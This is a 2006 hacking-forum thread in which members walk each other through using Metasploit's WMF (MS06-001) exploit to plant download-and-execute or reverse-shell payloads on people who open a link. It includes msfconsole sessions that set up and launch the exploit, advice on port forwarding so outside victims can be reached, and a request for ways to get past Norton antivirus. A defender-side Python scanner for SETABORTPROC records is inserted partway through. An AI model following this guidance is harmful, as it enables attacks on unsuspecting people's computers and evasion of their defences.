Wmf Exploit With Download & Exec Shellcode

#61 yking90

  • Private
  • Group: Members
  • Posts: 10
  • Joined: 20-December 05

Posted 10 January 2006 - 09:07 PM

guys, i'm still learning, is there any generator available? something like an image and exe file binder type that will generate the wmf file and then you can upload it onto a server and give someone the link?

any help will be greatly appreciated.

thanks
0

#62 stay

  • Master Sergeant
  • Group: Members
  • Posts: 493
  • Joined: 19-June 05

Posted 11 January 2006 - 04:57 AM

yking90, on Jan 11 2006, 07:07 AM, said:

guys, i'm still learning, is there any generator available? something like an image and exe file binder type that will generate the wmf file and then you can upload it onto a server and give someone the link?

any help will be greatly appreciated.

thanks


try using metasploit, save the "target" (the wmf file) using your browser, a download manager or whatever, and you have your wmf file - should be working. feedback appreciated.
0

#63 yking90

  • Private
  • Group: Members
  • Posts: 10
  • Joined: 20-December 05

Posted 11 January 2006 - 06:25 PM

stay, on Jan 11 2006, 11:57 PM, said:

try using metasploit, save the "target" (the wmf file) using your browser, a download manager or whatever, and you have your wmf file - should be working. feedback appreciated.


Thanks stay. I tried the tut posted by txR with the following result:
---------------------------

Quote

+ -- --=[ msfconsole v2.5 [113 exploits - 75 payloads]
msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > show TARGETS

Supported Exploit Targets
=========================

0 Automatic - Windows XP / Windows 2003 / Windows Vista

msf ie_xp_pfv_metafile > set TARGET 0
TARGET -> 0
msf ie_xp_pfv_metafile > show payloads

Metasploit Framework Usable Payloads
====================================

win32_downloadexec Windows Executable Download and Execute
win32_exec Windows Execute Command
win32_passivex Windows PassiveX ActiveX Injection Payload
win32_passivex_meterpreter Windows PassiveX ActiveX Inject Meterpreter Payload
win32_passivex_stg Windows Staged PassiveX Shell
win32_passivex_vncinject Windows PassiveX ActiveX Inject VNC Server Payload
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server Inject

msf ie_xp_pfv_metafile > set PAYLOAD win32_exec
PAYLOAD -> win32_exec
msf ie_xp_pfv_metafile(win32_exec) > set CMD calc.exe
CMD -> calc.exe
msf ie_xp_pfv_metafile(win32_exec) > check
[*] No check has been implemented for this module
msf ie_xp_pfv_metafile(win32_exec) > exploit
[*] Waiting for connections to http://192.168.38.78:8080/


The problem is, it just keeps waiting for connections there? What next?
0

#64 toe

  • Staff Sergeant
  • Group: Members
  • Posts: 271
  • Joined: 10-November 04

Posted 11 January 2006 - 06:40 PM

Quote

The problem is, it just keeps waiting for connections there? What next?


um lol. You send the link that it gives you to someone. If it's a 192.168.*.* it will be your LAN IP, so people outside your LAN won't be able to connect to it unless you have forwarded the port.

-toe
0

#65 yking90

  • Private
  • Group: Members
  • Posts: 10
  • Joined: 20-December 05

Posted 11 January 2006 - 06:54 PM

toe, on Jan 12 2006, 01:40 PM, said:

Quote

The problem is, it just keeps waiting for connections there? What next?


um lol. You send the link that it gives you to someone. If it's a 192.168.*.* it will be your LAN IP, so people outside your LAN won't be able to connect to it unless you have forwarded the port.

-toe


Damn yeah... (duhhh) figured that when i clicked on my link on my post itself :blink:

nevertheless, it popped up asking me to save a .tiff file?!

anyways, then i tried the other payload, win32_downloadexec, set the url to an exe file on my webserver (uploaded notepad.exe)... again, when i executed the exploit and went to my "192...." url, it popped up to save a .tiff file. nevertheless i saved it and opened it with Windows Picture and Fax viewer... nothing happened at all... ideally it should have downloaded that exe and executed it, right (in this case, shown me a notepad)???

:unsure:
0

#66 pita

  • Corporal
  • Group: Members
  • Posts: 153
  • Joined: 15-September 03

Posted 11 January 2006 - 09:37 PM

no, the shellcode in win32_downloadexec doesn't show anything on the screen, but you can see that there is a process named a.exe that started
0

#67 yking90

  • Private
  • Group: Members
  • Posts: 10
  • Joined: 20-December 05

Posted 12 January 2006 - 01:16 PM

thanks guys... to everyone who has actively helped.

i replaced the metasploit's default exploit by this one: http://www.frsirt.co...metafile.pm.php

now it seems to work correctly. but now Norton immediately rings an alarm every time i test the exploit! :blink:

what next to make this undetected? :unsure:

thank you all again :)
0
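Why an antivirus fires on the file the module serves (this is an added defender-side example, not code from the thread, from Metasploit or from the frsirt module linked above): the WMF vulnerability that ie_xp_pfv_metafile targets (MS06-001) is reached through a META_ESCAPE record whose escape function is SETABORTPROC, a record that an ordinary picture has no reason to contain, so scanners can flag the file on structure alone. The scanner below walks the WMF record chain, refuses malformed files rather than guessing, and reports any SETABORTPROC escape; the record and escape constants come from the WMF format, and the sample files are constructed inline here (they are detection test data, not exploit files).

```python
import struct

# Constants from the Windows Metafile format (MS-WMF), not from the thread.
PLACEABLE_MAGIC = 0x9AC6CDD7    # key of the optional 22-byte Aldus placeable header
META_EOF = 0x0000
META_SETMAPMODE = 0x0103
META_ESCAPE = 0x0626
ESCAPE_NEWFRAME = 0x0001        # a harmless printer escape, used for the benign sample
ESCAPE_SETABORTPROC = 0x0009    # the escape abused by the MS06-001 exploits


def wmf_records(data):
    """Yield (offset, function, params) for every record in a WMF blob.

    Raises ValueError on a malformed file instead of guessing: a scanner that
    silently stops at the first odd record is easy to walk around.
    """
    off = 0
    if len(data) >= 22 and struct.unpack_from('<I', data, 0)[0] == PLACEABLE_MAGIC:
        off = 22                                     # skip the placeable header
    if len(data) < off + 18:
        raise ValueError('truncated WMF header')
    mtype, hdr_words, _version = struct.unpack_from('<HHH', data, off)
    if mtype not in (1, 2) or hdr_words != 9:        # 1 = memory, 2 = disk metafile
        raise ValueError('not a WMF header')
    off += hdr_words * 2
    while True:
        if off + 6 > len(data):
            raise ValueError('file ends without META_EOF')
        # RecordSize is in 16-bit words and includes the size and function fields.
        size_words, func = struct.unpack_from('<IH', data, off)
        if size_words < 3:
            raise ValueError('record at %d has impossible size %d' % (off, size_words))
        end = off + size_words * 2
        if end > len(data):
            raise ValueError('record at %d runs past end of file' % off)
        yield off, func, data[off + 6:end]
        if func == META_EOF:
            return
        off = end


def find_setabortproc(data):
    """Offsets of META_ESCAPE records whose escape function is SETABORTPROC."""
    hits = []
    for off, func, params in wmf_records(data):
        if func == META_ESCAPE and len(params) >= 2:
            escape_fn = struct.unpack_from('<H', params, 0)[0]
            if escape_fn == ESCAPE_SETABORTPROC:
                hits.append(off)
    return hits


def scan(data):
    """Verdict tuple: ('malformed', reason), ('setabortproc', offsets) or ('clean', [])."""
    try:
        hits = find_setabortproc(data)
    except ValueError as exc:
        return ('malformed', str(exc))
    return ('setabortproc', hits) if hits else ('clean', [])


def build_wmf(records, placeable=False):
    """Constructed test data: a minimal WMF carrying the given (function, params) records."""
    body = b''
    max_words = 3
    for func, params in records:
        assert len(params) % 2 == 0, 'WMF record parameters are WORD-aligned'
        words = 3 + len(params) // 2
        max_words = max(max_words, words)
        body += struct.pack('<IH', words, func) + params
    body += struct.pack('<IH', 3, META_EOF)
    # META_HEADER: Type, HeaderSize (words), Version, Size (words), NumberOfObjects,
    # MaxRecord (words), NumberOfMembers.
    header = struct.pack('<HHHIHIH', 1, 9, 0x0300, 9 + len(body) // 2, 0, max_words, 0)
    wmf = header + body
    if placeable:
        # Key, HWmf, BoundingBox (4 x INT16), Inch, Reserved, Checksum (checksum left 0).
        wmf = struct.pack('<IHhhhhHIH', PLACEABLE_MAGIC, 0, 0, 0, 100, 100, 96, 0, 0) + wmf
    return wmf


# Constructed samples: a benign file with an innocuous escape, and a file that carries
# the SETABORTPROC escape followed by filler bytes (no payload, just the trigger shape).
BENIGN = build_wmf([
    (META_SETMAPMODE, struct.pack('<H', 8)),
    (META_ESCAPE, struct.pack('<HH', ESCAPE_NEWFRAME, 0)),
])
SUSPECT = build_wmf([
    (META_SETMAPMODE, struct.pack('<H', 8)),
    (META_ESCAPE, struct.pack('<HH', ESCAPE_SETABORTPROC, 4) + b'\x90' * 4),
])
SUSPECT_PLACEABLE = build_wmf([
    (META_SETMAPMODE, struct.pack('<H', 8)),
    (META_ESCAPE, struct.pack('<HH', ESCAPE_SETABORTPROC, 4) + b'\x90' * 4),
], placeable=True)

if __name__ == '__main__':
    for name, blob in (('benign', BENIGN), ('suspect', SUSPECT), ('truncated', SUSPECT[:-4])):
        print(name, scan(blob))
```

The same walk is what a mail gateway or proxy filter can run on any file that parses as a metafile regardless of its extension, which matters here because the module serves the file as .tiff.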

#68 huyremy

  • Private
  • Group: Members
  • Posts: 17
  • Joined: 15-January 06

Posted 15 January 2006 - 12:38 PM

pita, on Jan 12 2006, 12:37 PM, said:

no, the shellcode in win32_downloadexec doesn't show anything on the screen, but you can see that there is a process named a.exe that started

yes, that file location is C:\windows\system32\a.exe
But it seems not to work well. I tested on my PC and this is the error I get:
The NTVDM CPU has encountered an illegal instruction.
CS:0594 IP:0184 OP:63 74 69 76 65 Choose 'Close' to terminate the application

I think maybe something is wrong here. Please tell me the way to resolve that problem.
Thanks everybody
0

#69 zhaowei_hn

  • Private
  • Group: Members
  • Posts: 1
  • Joined: 17-January 06

Posted 17 January 2006 - 01:44 AM

mrgoolie, on Jan 5 2006, 02:47 PM, said:

alright, i tried with the port 1234 incoming port and then my internal port 8080
and it works, so i think maybe my provider blocks the port 8080, i dont know
so when a friend of mine goes to http://xxx.xxx.xxx.xxx:1234/test.wmf
it works, but his norton finds it:( and when he disables his norton, calc.exe doesn't start up.


Well, I think your problem here is that you're using an internal IP address behind a router; when you use NAT to translate the address and forward the port from the external IP to your computer, you complete the first part of this exploit, but the second part is... error ^.^

The first part: the Metasploit framework listens on its port (default is 8080), waiting for the victim to connect and receive the WMF exploit.
- When the victim connects to your external IP, the NAT at your router translates the address to your computer, and the WMF file is downloaded and executed at the victim's computer.

The second part: the WMF file redirects the user to your server again to execute the exploit payload at http://xxx.xxx.xxx.x...om_string).tiff, but the problem here is that the xxx.xxx.xxx.xxx IP is a local internal IP :P so the victim cannot receive this file through NAT. If you are using the external IP as your LHOST, it can't be done because you are staying in an internal local area network ^^

Solution: you can use a dedicated server as your Metasploit server, or you can change a little in the Metasploit exploit file; I don't say it here for some security reasons... you can private email me at: zhaowei_hn@yahoo.com for the answer...

Best regards... :rolleyes:

Now I have a small question: I can't get it done when using special characters like \ , > with the win32_exec payload CMD. When I use some command like "echo asdad > C:/test.txt" or "mkdir C:\\AAAAA" (I am using a double slash because of the shell special character rule), it still doesn't work.... Did I do something wrong???
0

#70 aisketui

  • Private
  • Group: Members
  • Posts: 7
  • Joined: 23-September 03

Posted 18 January 2006 - 02:21 AM

tq.. i also now know how to use metasploit.. emm with the web interface.. woww.. an easy tool for newbies like me
0

#71 parker2520

  • Private
  • Group: Members
  • Posts: 4
  • Joined: 08-October 05

Posted 18 January 2006 - 03:49 AM

where are you getting the Windows Executable Download and Execute payload for metasploit?
0

#72 LittleHacker

  • Master Sergeant
  • Group: Members
  • Posts: 453
  • Joined: 17-October 04

Posted 18 January 2006 - 06:30 AM

just update your metasploit

msfupdate -uxf
0
